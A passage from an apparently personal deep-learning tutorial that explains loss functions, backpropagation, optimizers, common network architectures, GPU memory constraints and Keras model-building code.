machine, the industry standard is Mean Squared Error.\nThe equation calculates the difference between the true label ($y$) and the model\u0026rsquo;s prediction ($\\hat{y}$): $$L = \\frac{1}{n}\\sum(y - \\hat{y})^2$$The hardware subtracts the prediction from the reality, squares the result, and averages it across the entire batch ($n$).\nWhy do we square it instead of just taking the absolute difference? Two mathematical reasons. First, squaring the number aggressively penalizes massive failures. If the model misses by 1 unit, the error is 1. If it misses by 10 units, the error is not 10 times worse; it is 100 times worse. This extreme penalty generates a massive error signal, forcing the optimizer to prioritize fixing catastrophic outliers rather than gently tweaking minor inaccuracies.\nSecond, squaring any number guarantees a positive output. When plotted across the parameter space, this mathematically forces the loss landscape into a clean, convex parabola.\nThis \u0026ldquo;bowl\u0026rdquo; shape is critical. It ensures that no matter where the optimizer currently sits on the slope, there is a smooth, continuous, predictable downward gradient pointing directly toward the mathematical minimum.\nCross-Entropy for Classification If you are building a classification model predicting whether an image is a dog or a cat MSE physically breaks down.\nClassification models output probability distributions (e.g., an 85% chance it is a dog). Because probabilities are strictly bounded between 0 and 1, the maximum possible error an MSE function could calculate is exactly 1. If a model is 99.9% confident an image is a dog, but it is actually a cat, MSE sees a maximum error of 1 and generates a very weak, unurgent gradient. The model learns almost nothing from being confidently wrong.\nTo fix this, classification relies on Cross-Entropy loss: $$L = -\\sum y \\log(\\hat{y})$$This equation abandons simple subtraction and introduces the natural logarithm. If the true label $y$ is 1 (it is a cat), and the model predicts a probability $\\hat{y}$ of only 0.01, the math evaluates $-\\log(0.01)$.\nLook at the curve of a negative logarithm. As the prediction ($\\hat{y}$) approaches 0 for a true class, the loss does not stop at 1 it shoots exponentially toward infinity. Cross-entropy mathematically ensures that if a model is confidently, entirely wrong, it suffers an astronomically high penalty. This massive numerical shock translates directly into a massive gradient, violently ripping the weights out of their incorrect configuration during the next step.\n3. Backpropagation The forward pass generated a prediction, and the loss function compressed the failure of that prediction into a single scalar number. Now we face the central mathematical hurdle of deep learning: how do you distribute the blame for that single error value across a matrix of billions of individual parameters?\nEvery weight in the network is essentially a physical knob. For a given setting of these millions of knobs, the GPU executes the forward pass and calculates the error. If we just randomly tweaked these parameter knobs to see if the error decreased, we would be relying on a mathematically blind \u0026ldquo;random perturbation\u0026rdquo; method that would take millennia to converge. To know exactly how much to adjust a specific weight in layer 1 based on an error calculated in layer 100, we need backpropagation.\nThe Gradient Vector To physically adjust a weight, the hardware needs a specific set of instructions. It needs a gradient. A gradient is simply a vector of partial derivatives. For every single parameter in the network, we must calculate the partial derivative of the Total Loss ($L$) with respect to that specific weight ($w$).\nThe math is written as: $$\\frac{\\partial L}{\\partial w}$$ Conceptually, this partial derivative answers a single question: If I nudge this specific weight up by a microscopic fraction, exactly how much does the total error change? This pipeline exploits differentiability to calculate the instantaneous rate of change, or the exact mathematical steepness, of the loss function for any specific weight. This effectively installs a theoretical prediction next to every single parameter in VRAM, explicitly telling the optimizer the exact direction and magnitude required to physically reduce the error.\nWhen the hardware calculates this derivative for every weight and aggregates them, it yields a vector that mathematically points in the direction of the steepest ascent. It points directly toward maximum error. To fix the model, the optimizer will eventually subtract this gradient to move down the slope toward the minimum error.\nThe Computational Graph and Interlocking Math Calculating $\\frac{\\partial L}{\\partial w}$ for the very last layer of the network is easy because those weights are directly connected to the loss function. But you cannot directly calculate the derivative of the loss with respect to a weight in the very first layer. That weight\u0026rsquo;s influence has been mathematically warped by 99 subsequent layers of matrix multiplications and non-linear activation functions.\nTo solve this, the network must be physically broken down into a computational graph of primitive, easily differentiable operations (like matrix addition and multiplication).\nThe GPU then connects these operations using the chain rule of calculus. We break the massive, impossible derivative into a chain of smaller, easily calculable local derivatives. Conceptually, the chain rule states that the error of a specific weight depends on the error of its activation, which depends on the error of the subsequent layer\u0026rsquo;s input, which eventually depends on the final loss function. You can visualize the chain rule as a massive sequence of interlocking physical cogwheels.\nWhen the optimizer nudges the first wheel (an input parameter), it physically forces a calculable rotation in the next wheel, which eventually drives the final output wheel. The exact mathematical amplitude of that final change is computed by sequentially chaining the local derivatives of every individual wheel together.\nExecution: The Forward and Backward Cascade The training loop executes this computational graph in two distinct, hardware-intensive phases. This is where the physical reality of the VRAM cache becomes critical.\n1. The Forward Step The data tensors are physically pushed from left to right through the computational graph. The GPU executes the math at each individual node, aggressively caching the intermediate numerical states (the activations) in VRAM, until it outputs the final prediction and the Total Loss scalar. To calculate the local derivative of an activation function later (like finding the slope of ReLU), the GPU must know the exact input number that originally passed through it.\n2. The Backward Step The sequence of calculations is mechanically unrolled in reverse order. The hardware takes that final error scalar and cascades it backward. Because every node in the graph is a primitive, known operation, the GPU simply applies hardcoded local derivative rules to the recalled VRAM tensors.\nAddition Nodes: An addition node acts as a physical router. It takes the incoming downstream gradient and simply copies it equally to the mathematical paths that originally fed into it. Multiplication Nodes: A multiplication node distributes the gradient crossways. It multiplies the incoming downstream gradient by the physically cached numerical value of the opposite incoming node. As the Tensor Cores multiply this incoming global error by the local derivative of the cached activations, the operation instantly yields two new gradients:\nThe specific error value for the weights in that layer (so they can be updated). The remaining error value is to be passed backward to the preceding layer. Layer by layer, the hardware physically multiplies the derivatives backward through the computational graph. By the time the cascade reaches the input layer, the chain rule has successfully mapped the global loss function back through the entire architecture. Every single weight parameter has been assigned its own precise mathematical error value.\nThe optimizer then executes a microscopic parameter nudge dictated by the learning rate ($\\alpha$), the unneeded VRAM caches are cleared, and the entire forward-backward-nudge loop repeats.\n4. Optimization Algorithms: The Engine of Descent Backpropagation calculates the error. It successfully maps the partial derivative of the loss function to every single parameter in the network. But backpropagation does not actually change the model. It simply finds the mathematical slope.\nThe optimizer is the engine that takes those gradients and physically alters the weights sitting in VRAM to drive the error down.\nGradient Descent At the core of every modern neural network is the Gradient Descent algorithm. The fundamental operation executed by the hardware for every single parameter is: $$w_{new} = w_{old} - \\alpha \\nabla L$$Equation break down:\n$\\nabla L$: The gradient vector calculated by backpropagation. As established, this mathematically points up the error hill toward the steepest ascent. Subtraction: Because the gradient points toward maximum error, we must subtract it from our current weight ($w_{old}$) to force the optimizer to travel in the exact opposite direction down the slope toward the minimum loss. The Learning Rate ($\\alpha$): This is the single most critical hyperparameter in deep learning. The gradient tells you the direction, but the learning rate dictates the physical size of the step. If $\\alpha$ is too large, the weight update is so violent that it overshoots the minimum entirely, bouncing up the opposite wall of the loss ravine until the numbers explode into NaNs. If $\\alpha$ is too small, the GPU will spend months making microscopic adjustments, often getting permanently trapped in the first shallow depression (a local minimum) it encounters.\nBatching Strategies How often should the optimizer execute this $w_{new}$ equation?\nStochastic Gradient Descent (SGD): This means updating the weights after processing a single data point (Batch size 1). Mathematically, the gradient is wildly erratic because the optimizer is reacting to the noise of individual samples. You are using a massively parallel GPU to compute a single vector, leaving 99% of your Tensor Cores idling and bottlenecking the entire system on memory latency. Full Batch Gradient Descent: This involves calculating the gradient for the entire 500GB dataset before executing a single weight update. Mathematically, this is flawless; it calculates the true, perfect gradient of the entire data manifold. Physically, it is impossible. You cannot fit the activations of a 500GB dataset into VRAM to run backpropagation unless you crazy. Mini-Batch: The industry standard. Process chunks of data (e.g., Batch size 32, 128, or 256). This provides a mathematically stable approximation of the true gradient. More importantly, batch sizes are specifically chosen in multiples of 8, 32, or 64 to perfectly align with the physical architecture of the GPU\u0026rsquo;s memory controllers, maximizing memory bandwidth and fully saturating the compute cores. Modern Optimizers Standard Gradient Descent is naive. It only looks at the exact slope of the current step. If the optimizer enters a flat ravine where the gradient approaches zero, the weight updates shrink to zero, and the model stops learning entirely.\nTo solve this, we alter the engine.\nMomentum: Instead of only using the current gradient, the optimizer calculates a moving average of past gradients. If the optimizer has been moving rapidly down a slope for 100 steps, it builds \u0026ldquo;speed.\u0026rdquo; If it suddenly hits a tiny mathematical bump (a local minimum) where the gradient briefly points backward, the accumulated momentum overpowers the bump and carries the optimizer through it, allowing it to traverse flat areas vastly faster. Adam (Adaptive Moment Estimation): Adam is the undisputed default for 95% of deep learning because it solves a massive architectural flaw in standard Gradient Descent. Basic SGD uses one global Learning Rate ($\\alpha$) for all 70 billion parameters in a model. Adam abandons this. It merges Momentum (the first moment) with RMSprop (the second moment, which tracks variance). Instead of applying a blanket $\\alpha$ across the entire network, Adam dynamically calculates a custom, adaptive learning rate for every single weight independently. If a specific weight has been bouncing erratically with high variance, Adam automatically shrinks that specific parameter\u0026rsquo;s learning rate to stabilize it. If a weight has been smoothly coasting in one direction, Adam accelerates it. It completely decentralizes the learning rate, turning one massive optimization problem into billions of individually tuned micro-descents.\nNOTE: Adam helps speed up the first part of the training process by taking larger leaps and bounds but when it comes to the more micro adjustments it takes smaller steps allowing for the fine tuning.\nTraining Methodologies \u0026amp; Architectures 1. Training Methodologies: The Source of the Error Signal The entire learning process is driven by the loss function. The optimizer requires an error signal to calculate the gradients. The fundamental difference between training methodologies comes down to a single question: where does that error signal come from?\nSupervised Learning Supervised learning is the brute-force approach to machine learning.\nThe Mathematical Definition: To calculate the loss, the hardware requires two separate tensors to be loaded into VRAM simultaneously: the input data $X$ and a discrete, external label $y$. The network executes the forward pass to generate a prediction $\\hat{y}$, and the loss function calculates the exact mathematical delta between $\\hat{y}$ and $y$. The Physical Bottleneck: The $y$ tensor does not magically exist. For supervised learning to work, humans must manually classify, tag, and construct the $y$ tensor for millions of rows of data. This creates a massive physical and economic bottleneck. Furthermore, the loss function is completely blind to reality; it only sees the tensor. If a tired human annotator mislabels an image of a dog as a cat, the math treats that human error as absolute ground truth. The optimizer will violently adjust the network\u0026rsquo;s weights to perfectly replicate that human mistake. The network does not optimize for reality; it optimizes for the label or for how bad humans are at labeling lots of datapoints while not being paid much. Not the best model output. Unsupervised Learning (Finding the Manifold) Human labeling is too expensive, so how do you calculate an error gradient without a $y$ tensor? You hack the math. You use the raw input data itself as the label, setting $y = X$.\nAutoencoders: This is the foundational architecture for unsupervised representation learning. The Architecture (Encoder and Decoder): Instead of a standard feedforward shape, an Autoencoder is built like an hourglass. The first half of the network is the Encoder. It takes a massive, high-dimensional input tensor (like a high-resolution image) and forces it through successively smaller hidden layers. This physically crushes the data down into a tiny, low-dimensional vector known as the \u0026ldquo;latent space\u0026rdquo; or the bottleneck. The second half of the network is the Decoder. It takes the compressed latent vector and uses expanding hidden layers to reconstruct the original high-resolution input from scratch. The Loss: The loss function is simply the Mean Squared Error between the raw input tensor $X$ and the reconstructed output tensor $\\hat{X}$. To drive this error down, backpropagation physically forces the Encoder\u0026rsquo;s weights to discover the absolute most efficient mathematical compression of the data. It forces the network to map the hidden, underlying structure (the manifold) of the dataset, automatically separating critical features from useless noise all without a single human-generated label. 2. Transfer Learning \u0026amp; Fine-Tuning Training a deep architecture from scratch is an exercise in brute-force computation. It requires massive, highly variance-rich datasets and weeks of continuous GPU cycles to force the optimizer to slowly build feature representations from random noise. Transfer learning bypasses this mathematical grind entirely by hijacking the feature representations of pre-trained models and bending them to a new task.\nThe Mechanics of Weight Freezing When you download a model trained on millions of generic images, the lower hidden layers have already mathematically converged on how to detect universal features like edges, curves, and textures. To preserve this, you must physically intervene in the training loop.\nAt the hardware level, you sever the lower layers of the model from the computational graph. You do this by explicitly disabling gradient tracking for those specific parameters (for example, setting requires_grad = False in your framework). When the framework constructs the backward pass, it completely ignores these frozen matrices.\nVRAM Savings This mechanical severing creates a massive hardware advantage. As established in the forward pass mechanics, a network normally must hoard gigabytes of intermediate activation tensors in VRAM so the chain rule can calculate local derivatives later.\nBecause the lower layers are now frozen, the GPU explicitly knows it will not need to calculate their gradients. Therefore, the GPU does not need to cache their intermediate activations during the forward pass, and the backpropagation cascade physically halts before reaching them. By simply flipping that gradient tracking flag, you can slash the VRAM requirements of the training loop by up to 80%, allowing you to train massive enterprise-grade models on consumer hardware. Not really but same effect as quantization but for training.\nHead Replacement and Fine-Tuning A pre-trained model is hardwired to output 1,000 specific classes for example. If you are building a binary classifier for factory defect detection, that architecture is useless. You must perform head replacement.\nYou literally delete the pre-trained model\u0026rsquo;s final Output Layer (the \u0026ldquo;head\u0026rdquo;) and graft a new, randomly initialized matrix onto the end of the network, explicitly shaped for your data (e.g., a 2-class output).\nWhen you initialize the training loop, you configure the optimizer with a microscopic learning rate ($\\alpha$). Because the new head is random noise, it will initially generate massive errors. If your learning rate is too high, the resulting violent gradients will propagate backward and mathematically destroy the delicate, pre-learned feature representations in any unfrozen deeper layers. A microscopic learning rate ensures the optimizer strictly trains the chaotic new head while making only tiny, non-destructive adjustments to the deeper representations.\n3. Core Architectures You cannot use the same network architecture for every problem. The physical structure of your raw data must dictate the structure of the matrix multiplications executing on the GPU. If you force spatial data or time-series data into the wrong mathematical framework, you will either completely exhaust your VRAM or mathematically obliterate the inherent patterns in the data before the optimizer even sees them.\nMultilayer Perceptrons (MLPs) The Multilayer Perceptron is the standard, fully connected neural network. Its defining physical characteristic is dense connectivity: every single neuron in Layer A has a dedicated weight connecting it to every single neuron in Layer B.\nThis architecture is perfectly suited for flat, tabular data (e.g., a CSV file predicting house prices based on isolated features such as square footage, zip code, and age). However, the moment you apply an MLP to high-dimensional spatial data, you encounter the VRAM scaling problem.\nIn an MLP, the number of weights scales geometrically ($O(n^2)$). Imagine feeding a flat, grayscale 1-megapixel image into the network. That image is an input tensor of 1,000,000 individual pixels. If your first hidden layer contains just 1,000 neurons, the GPU must calculate a unique weight for every pixel-to-neuron connection.\n$1,000,000 \\text{ inputs} \\times 1,000 \\text{ neurons} = 1,000,000,000 \\text{ parameters}$\nThat is 1 billion parameters for a single, mathematically shallow hidden layer. Storing that weight matrix and its associated optimizer states would consume gigabytes of VRAM. Furthermore, by flattening the 2D image into a 1D line to feed the MLP, you physically destroy the spatial relationships between the pixels. It is physically and mathematically impossible to scale MLPs for modern computer vision.\nConvolutional Neural Networks (CNNs) To process spatial data, the architecture must abandon dense connections. Instead of connecting every pixel to a neuron, CNNs use localized, sliding weight matrices called \u0026ldquo;kernels\u0026rdquo; or \u0026ldquo;filters.\u0026rdquo;\nThe Convolution Operation: A kernel is just a tiny matrix, typically 3x3 or 5x5. The GPU applies this 3x3 kernel by physically sliding it across the image tensor, computing a localized dot product at each step. Instead of looking at the entire image at once, the math forces the network to examine small, overlapping 9-pixel chunks, preserving 2D spatial relationships.\nWeight Sharing: This is where the VRAM savings occur. The exact same 3x3 kernel slides across the entire image. To detect a vertical edge in the top-left corner, the GPU uses the same 9 parameters it uses to detect one in the bottom-right corner. By sharing these weights across the spatial dimensions, the GPU only has to store and update 9 parameters (plus 1 bias) instead of 1 billion. This slashes the parameter count by orders of magnitude while drastically improving the mathematical detection of features. Pooling: As a CNN gets deeper, it generates dozens of \u0026ldquo;feature maps\u0026rdquo; (outputs of the kernels). If left unchecked, these cached activations will bloat VRAM during the forward pass. To fix this, CNNs use pooling layers to mathematically downsample the tensors. A max-pooling layer takes a 2x2 grid of the tensor and simply outputs the maximum value, discarding the rest. This violently shrinks the physical size of the intermediate activations by 75% at each step, slashing the VRAM footprint and allowing the network to grow deeper without crashing the hardware. Recurrent Neural Networks (RNNs) and LSTMs CNNs and MLPs expect input tensors with strict, fixed physical shapes. Time-series data—like an audio waveform, a sequence of stock prices, or a sentence of text—is dynamic. It varies in length, and understanding the current data point requires mathematical memory of the past.\nThe Hidden State: Standard feedforward networks process Batch 1, delete it from memory, and move to Batch 2. RNNs introduce a feedback loop. When processing sequential data, the RNN calculates the output of the network at Time Step 1 ($t_1$). When Time Step 2 ($t_2$) arrives, the RNN physically concatenates the new input tensor with the hidden state output from $t_1$. The network literally feeds its own past mathematical calculations into its current dot product. Backpropagation Through Time (BPTT): This feedback loop creates a massive hardware bottleneck during training. To calculate gradients for an RNN, the GPU cannot just look at the current layer. It must mathematically \u0026ldquo;unroll\u0026rdquo; the entire sequence loop in memory. If you feed the network a sequence of 1,000 time steps, the GPU must cache 1,000 sequential activation states in VRAM. The backward pass must then cascade back through all 1,000 steps to calculate the exact origin of the error.\nThe Vanishing Gradient and LSTMs: BPTT exposes a fatal mathematical flaw in standard RNNs. As the gradient is multiplied backward through hundreds of unrolled time steps, the repeated multiplication of values less than 1 causes the gradient to shrink exponentially. Within a few steps, the gradient vanishes to zero. The network mathematically forgets early inputs because the error signal physically cannot reach them. Long Short-Term Memory (LSTM) networks solve this structural flaw by abandoning the simple feedback loop and introducing explicit, physical gates. LSTMs use Sigmoid (squashing values between 0 and 1) and tanh (squashing values between -1 and 1) activation functions to implement a \u0026ldquo;Forget Gate,\u0026rdquo; an \u0026ldquo;Input Gate,\u0026rdquo; and an \u0026ldquo;Output Gate.\u0026rdquo;\nThese gates mathematically dictate exactly what information is allowed to enter a protected \u0026ldquo;Cell State.\u0026rdquo; This Cell State acts as a frictionless, uninterrupted mathematical highway running straight through the time steps, allowing gradients to flow backward through thousands of sequential inputs without vanishing, thereby solving the hardware memory problem and enabling the network to retain long-term context.\nImplementation This section is not done and I will be filling it out more. I asked the AI to fill out some of the code blocks for the current state so no idea if it\u0026rsquo;s relevant but it\u0026rsquo;s put in their to give some examples as I plan on doing a section on implementation once I have a better idea of how it can be used for smaller user cases.\n1. The Infrastructure of Training The required compute is determined entirely by two variables: the model\u0026rsquo;s total parameter count and the specific training methodology you use. You cannot code your way out of a physical VRAM bottleneck.\nSmall-Scale Architectures (Millions of Parameters) When training networks with tens or hundreds of millions of parameters from scratch, the mathematical requirements fit comfortably within standard, discrete compute environments.\nThe VRAM Requirement: The hard limit for this tier is typically between 16GB and 24GB of VRAM. This is enough physical memory to store the model\u0026rsquo;s weights, cache intermediate forward-pass activations, and hold the optimizer states (such as Adam\u0026rsquo;s momentum trackers). The PCIe Bottleneck: At this scale, raw compute speed is rarely the primary point of failure. The bottleneck is the PCIe bus. If your CPU and standard SSD cannot fetch, decode, and push data across the motherboard fast enough, the GPU\u0026rsquo;s massive parallel compute cores will simply sit idle. Unified Memory: Modern systems utilizing a Unified Memory architecture completely bypass this latency. By physically allowing the CPU and GPU to share a single, massive pool of high-bandwidth memory, the hardware avoids shuttling tensors back and forth across a motherboard slot. It trades the absolute highest raw Matrix Multiply-Accumulate speed for massive, uninterrupted memory capacity, allowing seamless local processing.\nLarge-Scale Architectures (Billions of Parameters) When you scale up to modern Large Language Models (LLMs) possessing billions of parameters, the physical reality of the math changes completely.\nThe HBM Requirement: If you attempt to run a full backpropagation loop on a 7-billion-parameter model with 24GB of VRAM, the script will crash immediately. The optimizer states that a model of that size requires massive memory pools. To train these from scratch, you need chips equipped with 40GB to 80GB+ of High Bandwidth Memory (HBM) stacked directly on the silicon die. The Storage Starvation: At this massive scale, the speed at which you can calculate gradients outpaces the speed of standard storage. If you are operating on a virtualized cloud instance and attach a cheap, low-IOPS network drive, the CPU will spend all its time waiting for data packets to arrive over the datacenter\u0026rsquo;s Ethernet. The compute engine will starve. Training at this scale requires explicitly provisioning high-throughput NVMe block storage to ensure the data pipeline can keep the cores saturated at 100% utilization. Multi-GPU and Distributed Training When a model scales to tens or hundreds of billions of parameters, its mathematical state cannot physically fit into even a single 80GB VRAM pool. The calculus must be violently split across multiple GPUs.\nThere are two primary ways to distribute this workload:\nPipeline Parallelism: The model is sliced horizontally. GPU 1 holds layers 1-10, while GPU 2 holds layers 11-20. GPU 1 processes the forward pass, sends the cached activations across the wire to GPU 2, and then goes completely idle while GPU 2 works. It is structurally easier to program but highly inefficient due to catastrophic hardware idling. Tensor Parallelism: The model is sliced vertically. The actual matrix multiplications for a single layer are mathematically decomposed, computed simultaneously across multiple GPUs, and the resulting tensors are summed before moving to the next layer. Tensor parallelism keeps all GPUs saturated at 100% utilization, but it introduces a massive communication penalty. The GPUs must sync their math after every single layer. A standard PCIe connection is far too narrow and slow to handle this cross-talk. To execute tensor parallelism effectively, the GPUs must be physically bridged by proprietary hardware interconnects (such as NVIDIA\u0026rsquo;s NVLink), which provide a dedicated, high-bandwidth highway directly between the chips, bypassing the CPU and motherboard entirely.\nParameter-Efficient Fine-Tuning (PEFT) How do you train a massive, billion-parameter model if you only have a consumer GPU and cannot afford an NVLink cluster? You change the training methodology.\nYou cannot train a 7B model from scratch on 24GB of VRAM, but you can fine-tune one using techniques like Low-Rank Adaptation (LoRA).\nInstead of updating all 7 billion parameters, LoRA physically freezes the massive, pre-trained weight matrices. The framework explicitly disables gradient tracking for the base model, severing it from the backward pass. It then injects tiny, randomly initialized \u0026ldquo;low-rank\u0026rdquo; matrices alongside the frozen weights. During backpropagation, the GPU only calculates gradients and updates the optimizer states for these microscopic new matrices.\nBy altering the mathematical method, you slash the VRAM requirements by up to 90%. This physical hack allows you to load massive enterprise-grade architectures into standard memory pools and train them at high speeds without crashing the hardware.\n2. Keras Sequential API Focus This is the highest level of abstraction. It is fast and simple, but mathematically rigid.\nThe Architecture Building a model is accomplished by simply passing a Python list of layer objects to tf.keras.Sequential(). It is the easiest way to construct a neural network, provided that each layer connects to exactly one input tensor and one output tensor.\nUnder the Hood TensorFlow automatically handles the tensor routing. You do not need to explicitly define the input shape for every hidden layer; you only specify it for the very first layer so the framework knows the dimensions of the incoming data. From there, the framework automatically calculates the required matrix transformations mathematically based on the previous layer\u0026rsquo;s output shape.\nThe Levers Here is the exact code required to build a basic 3-layer architecture. To physically prove the VRAM parameter explosion ($O(n^2)$) We discussed in Phase 4 that we will feed a flat 1-megapixel image (1,000,000 pixels) into a dense network and ask TensorFlow to calculate the parameter count.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import tensorflow as tf from tensorflow.keras import layers, models # 1. Instantiate the linear stack model = models.Sequential() # 2. Add layers sequentially # Input: A flat 1-megapixel image (1,000,000 pixels) model.add(layers.Input(shape=(1000000,))) # Hidden Layer 1: 1,000 neurons model.add(layers.Dense(1000, activation=\u0026#39;relu\u0026#39;)) # Hidden Layer 2: 512 neurons model.add(layers.Dense(512, activation=\u0026#39;relu\u0026#39;)) # Output Layer: 10 classes model.add(layers.Dense(10, activation=\u0026#39;softmax\u0026#39;)) # 3. Print the hardware reality model.summary() When you execute model.summary(), the framework prints the exact size of the weight matrices it must allocate in VRAM. The output for this simple 3-layer network looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Model: \u0026#34;sequential\u0026#34; _________________________________________________________________ Layer (type) Output Shape Param # ======================================================== dense (Dense) (None, 1000) 1000001000 dense_1 (Dense) (None, 512) 512512 dense_2 (Dense) (None, 10) 5130 ======================================================== Total params: 1,000,518,642 Trainable params: 1,000,518,642 Non-trainable params: 0 _________________________________________________________________ Look at the Param # for the very first hidden layer. Because Dense layers require every input to connect to every neuron, the GPU must allocate exactly 1,000,001,000 parameters ($1,000,000 \\text{ inputs} \\times 1,000 \\text{ weights} + 1,000 \\text{ biases}$) just for that single mathematical step.\nIf you attempt to compile and train this model locally, the framework will immediately throw an Out of Memory error because the physical weight matrices exceed standard VRAM capacities.\nThe Limitation The Sequential API strictly assumes one input tensor, one output tensor, and a perfectly linear cascade of math. You cannot build complex, modern architectures with it. If your data requires branching, merging, or routing an activation tensor around a layer (skip connections), the Sequential API physically cannot map the computational graph.\n3. Keras Functional API Focus While the Sequential API is easy, it is useless for modern production models. The Keras Functional API abandons the linear list constraint and treats layers strictly as mathematical functions. This allows you to explicitly map the exact flow of the tensors, enabling complex architectures like branching, merging, and multiple inputs or outputs.\nGraph Topology Instead of adding layers to a list, you define a standalone Input tensor that explicitly dictates the physical shape of the incoming data. You then physically pass this tensor into a layer, and that layer returns a new, transformed tensor. You manually chain these functions together to build a Directed Acyclic Graph (DAG) of matrix operations.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import tensorflow as tf from tensorflow.keras import layers, Model # 1. Explicitly define the input tensor inputs = layers.Input(shape=(256, 256, 3)) # 2. Treat layers as mathematical functions that take a tensor and return a tensor x = layers.Conv2D(32, kernel_size=(3, 3), activation=\u0026#39;relu\u0026#39;)(inputs) x = layers.MaxPooling2D(pool_size=(2, 2))(x) x = layers.Flatten()(x) # 3. Define the final mathematical output outputs = layers.Dense(10, activation=\u0026#39;softmax\u0026#39;)(x) # 4. Instantiate the graph by defining its strict input/output boundaries model = Model(inputs=inputs, outputs=outputs) Branching and Merging (Multiple Inputs) In the real world, data is multimodal. You might have a model that needs to predict house prices using both a flat CSV of numeric features (square footage, age) and a 2D image tensor (a photo of the house).\nThe Functional API allows you to build completely independent parallel branches of math and physically merge them together deeper in the network.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 # Branch A: Numeric Data (e.g., 10 features) numeric_input = layers.Input(shape=(10,), name=\u0026#34;numeric_data\u0026#34;) x = layers.Dense(64, activation=\u0026#39;relu\u0026#39;)(numeric_input) # Branch B: Image Data (e.g., 128x128 RGB) image_input = layers.Input(shape=(128, 128, 3), name=\u0026#34;image_data\u0026#34;) y = layers.Conv2D(32, (3, 3), activation=\u0026#39;relu\u0026#39;)(image_input) y = layers.Flatten()(y) # Merge: Concatenate the two feature representations into a single tensor combined = layers.concatenate([x, y]) # Final Output based on the merged tensor outputs = layers.Dense(1, activation=\u0026#39;linear\u0026#39;)(combined) # Build the multi-input model model = Model(inputs=[numeric_input, image_input], outputs=outputs) Skip Connections The most powerful physical \u0026ldquo;lever\u0026rdquo; the Functional API provides is the ability to route data around bottlenecks. As discussed in Phase 4, deep networks suffer from vanishing gradients. The ResNet architecture solved this by introducing the \u0026ldquo;skip connection\u0026rdquo; (or residual connection).\nInstead of forcing a tensor to pass exclusively through Layer B, you split the tensor. One path goes through Layer B to undergo mathematical transformation, while the other path physically bypasses Layer B entirely. You then use element-wise addition to merge the raw, untransformed tensor back into the processed tensor.\nThis creates an uninterrupted mathematical highway for the backward pass, allowing gradients to flow deep into the network without degrading.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 inputs = layers.Input(shape=(64,)) # The primary tensor flow x = layers.Dense(64, activation=\u0026#39;relu\u0026#39;)(inputs) # Save the raw activation state to a separate variable residual = x # Pass the tensor through a deep, potentially destructive bottleneck x = layers.Dense(64, activation=\u0026#39;relu\u0026#39;)(x) x = layers.Dense(64, activation=\u0026#39;relu\u0026#39;)(x) # Skip Connection: Add the raw residual tensor back into the degraded tensor x = layers.add([x, residual]) outputs = layers.Dense(10, activation=\u0026#39;softmax\u0026#39;)(x) model = Model(inputs=inputs, outputs=outputs) 4. Model Subclassing (Object-Oriented Architecture) Focus The Functional API constructs a Directed Acyclic Graph (DAG). It is incredibly powerful, but it is entirely static. Once the model is compiled, the physical path the tensors will take through the VRAM is permanently locked. If you need a network that dynamically reconfigures its architecture on the fly based on the specific data it is processing at that exact millisecond, static graphs fail.\nModel Subclassing drops the functional graph entirely. It allows you to build fully custom, object-oriented architectures where the forward pass is evaluated dynamically at runtime using standard Python control flow.\nThe Mechanics of Object-Oriented Math To build a subclassed model, you write a custom Python class that inherits directly from tf.keras.Model. This forces you to explicitly separate the physical allocation of VRAM from the mathematical execution of the tensors.\nYou must define two core methods:\n__init__ (The Constructor): This is the allocation phase. You physically instantiate all the required weight matrices (the layers) here so the framework knows to track their parameters for gradient calculation. You are not passing data through them yet; you are just claiming the memory. call (The Execution Engine): This is where you manually define the exact mathematical forward pass. Because this method executes at runtime for every batch, you can use standard Python if/else statements, for loops, and dynamic tensor routing. The Levers (Dynamic Computational Graphs) Why would you go through the trouble of writing object-oriented models instead of just chaining functions? Dynamic routing.\nImagine you are building a system that processes network traffic packets. Most packets are simple and benign, but a small percentage are highly complex and potentially malicious. If you use a static Functional API model, every single packet—even the simple ones—must be forced through the deepest, most computationally expensive layers of your network, wasting massive amounts of GPU time.\nWith Model Subclassing, you can write conditional logic directly into the silicon\u0026rsquo;s execution path.\nIn the call method, you can instruct the GPU to mathematically evaluate the variance of the incoming tensor. If the variance is low, route it through a fast, shallow \u0026ldquo;classifier\u0026rdquo; block and exit immediately. Else (if the variance is high), route the tensor into a massive, 50-layer deep bottleneck for intense scrutiny.\nHere is the exact code demonstrating this dynamic architectural lever:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 import tensorflow as tf from tensorflow.keras import layers, Model class DynamicRouterModel(Model): def __init__(self, **kwargs): super(DynamicRouterModel, self).__init__(**kwargs) # 1. VRAM Allocation Phase: Instantiate the individual layers # The framework tracks these to calculate gradients later self.entry_dense = layers.Dense(64, activation=\u0026#39;relu\u0026#39;) # Fast path for simple data self.shallow_classifier = layers.Dense(10, activation=\u0026#39;softmax\u0026#39;) # Heavy path for complex data self.deep_bottleneck_1 = layers.Dense(256, activation=\u0026#39;relu\u0026#39;) self.deep_bottleneck_2 = layers.Dense(256, activation=\u0026#39;relu\u0026#39;) self.heavy_classifier = layers.Dense(10, activation=\u0026#39;softmax\u0026#39;) def call(self, inputs, training=False): # 2. Execution Phase: This runs dynamically for every batch x = self.entry_dense(inputs) # Calculate the mathematical variance of the batch tensor tensor_variance = tf.math.reduce_variance(x) # The Lever: Dynamic Conditional Routing # If variance is low, use the computationally cheap path if tensor_variance \u0026lt; 0.5: return self.shallow_classifier(x) # Else, force the tensor through the heavy compute blocks else: x = self.deep_bottleneck_1(x) x = self.deep_bottleneck_2(x) return self.heavy_classifier(x) # Instantiate and build the model model = DynamicRouterModel() # The architecture is not physically locked until the first batch of data is pushed through it dummy_data = tf.random.normal((32, 100)) output = model(dummy_data) Notice that the architecture is not locked until data actually hits the call method. The network physically alters its computational depth batch-by-batch. This level of total mathematical control is strictly impossible in the Sequential or Functional APIs.\n5. Custom Training Loops (Manual Calculus) Focus The Sequential, Functional, and Subclassed APIs all generally rely on a single command to execute the training process: model.fit(). Calling this method hands total control of the hardware and the math over to TensorFlow\u0026rsquo;s high-level C++ backend. It abstracts away the forward pass, the loss calculation, backpropagation, and the optimizer step into a black box.\nIf you need bare-metal access to the calculus engine, you 